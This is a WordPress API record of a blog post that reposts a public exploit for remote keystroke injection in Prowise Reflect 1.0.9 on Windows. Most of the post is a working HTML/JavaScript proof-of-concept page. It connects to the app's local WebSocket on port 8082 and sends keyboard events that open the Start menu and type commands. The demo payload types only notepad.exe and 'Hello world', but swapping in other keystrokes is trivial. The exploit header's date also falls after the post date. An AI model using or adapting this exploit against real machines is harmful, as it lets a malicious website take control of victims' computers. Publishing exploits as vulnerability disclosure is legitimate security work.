{"id":21195,"date":"2022-03-02T20:08:53","date_gmt":"2022-03-02T17:08:53","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166187\/prowisereflect109-inject.txt"},"modified":"2022-03-06T11:49:35","modified_gmt":"2022-03-06T08:19:35","slug":"prowise-reflect-1-0-9-remote-keystroke-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/prowise-reflect-1-0-9-remote-keystroke-injection\/","title":{"rendered":"Prowise Reflect 1.0.9 Remote Keystroke Injection"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Prowise Reflect v1.0.9 &#8211; Remote Keystroke Injection<br \/>\n# Date: 30\/10\/2022<br \/>\n# Exploit Author: Rik Lutz<br \/>\n# Vendor Homepage: https:\/\/www.prowise.com\/<br \/>\n# Version: V1.0.9<br \/>\n# Tested on: Windows 10<\/p>\n<p dir=\"ltr\"># Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.<br \/>\n# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),<br \/>\n# or by visiting a malicious website. This POC contains the malicious webpage.<br \/>\n# Steps:<br \/>\n# 1. Start Prowise reflect<br \/>\n# 2. Try to connect to a reflect server e.q. ygm7u6od<br \/>\n# 3. When it is connecting click exploit<br \/>\n# &#8211; Start menu will open, types notepad.exe and types hello world.<\/p>\n<p dir=\"ltr\">&lt;!DOCTYPE HTML&gt;<\/p>\n<p dir=\"ltr\">&lt;html&gt;<br \/>\n&lt;head&gt;<\/p>\n<p dir=\"ltr\">&lt;script type = &#8220;text\/javascript&#8221;&gt;<\/p>\n<p dir=\"ltr\">function wait(ms){<br \/>\nvar start = new Date().getTime();<br \/>\nvar end = start;<br \/>\nwhile(end &lt; start + ms) {<br \/>\nend = new Date().getTime();<br \/>\n}<br \/>\n}<\/p>\n<p dir=\"ltr\">function WebSocketTest() {<br \/>\nvar StateConnecting = new Boolean(false);<br \/>\nif (&#8220;WebSocket&#8221; in window) {<br \/>\n\/\/ Let us open a web socket<br \/>\nvar ws = new WebSocket(&#8220;ws:\/\/localhost:8082&#8221;);<\/p>\n<p dir=\"ltr\">ws.onopen = function() {<\/p>\n<p dir=\"ltr\">ws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;key&#8221;:&#8221;super&#8221;}&#8217;);<br \/>\nwait(400);<br \/>\n\/\/character is slower<br \/>\n\/\/ ws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;character&#8221;:&#8221;notepad.exe&#8221;}&#8217;};<\/p>\n<p dir=\"ltr\">\/\/ You can check for connecting state by sending {&#8220;event&#8221;:&#8221;setupRTCConnection&#8221;, &#8220;remoteName&#8221;:&#8221;a&#8221;} if the response is {&#8220;event&#8221;:&#8221;streamAvailable&#8221;} getIsConnecting == true<br \/>\nvar exploitcode = &#8220;notepad.exe&#8221;<br \/>\nfor (let i = 0; i &lt; exploitcode.length; i++) {<br \/>\nws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;key&#8221;:&#8221;&#8216; + exploitcode[i] + &#8216;&#8221;}&#8217;);<br \/>\n}<\/p>\n<p dir=\"ltr\">wait(300);<br \/>\nws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;key&#8221;:&#8221;enter&#8221;}&#8217;);<br \/>\nwait(2000);<br \/>\nexploitcode = &#8220;Hello world!&#8221;<\/p>\n<p dir=\"ltr\">for (let i = 0; i &lt; exploitcode.length; i++) {<br \/>\nws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;key&#8221;:&#8221;&#8216; + exploitcode[i] + &#8216;&#8221;}&#8217;);<br \/>\n}<br \/>\nwait(200);<br \/>\n};<\/p>\n<p dir=\"ltr\">ws.onmessage = function (evt) {<br \/>\nvar received_msg = evt.data;<br \/>\n};<\/p>\n<p dir=\"ltr\">ws.onclose = function() {<\/p>\n<p dir=\"ltr\">\/\/ websocket is closed.<br \/>\nalert(&#8220;Connection is closed&#8230;&#8221;);<br \/>\n};<br \/>\n} else {<br \/>\n\/\/ The browser doesn&#8217;t support WebSocket<br \/>\nalert(&#8220;WebSocket NOT supported by your Browser!&#8221;);<br \/>\n}<br \/>\n}<br \/>\n&lt;\/script&gt;<\/p>\n<p dir=\"ltr\">&lt;\/head&gt;<\/p>\n<p dir=\"ltr\">&lt;body&gt;<br \/>\n&lt;div id = &#8220;sse&#8221;&gt;<br \/>\n&lt;a href = &#8220;javascript:WebSocketTest()&#8221;&gt;Exploit!&lt;\/a&gt;<br \/>\n&lt;\/div&gt;<\/p>\n<p dir=\"ltr\">&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Prowise Reflect v1.0.9 &#8211; Remote Keystroke Injection # Date: 30\/10\/2022 # Exploit Author: Rik Lutz # Vendor Homepage: https:\/\/www.prowise.com\/ # Version: V1.0.9 # Tested on: Windows 10 # Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. # Much like how a rubber ducky attack works but &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21195","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21195","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21195"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21195\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}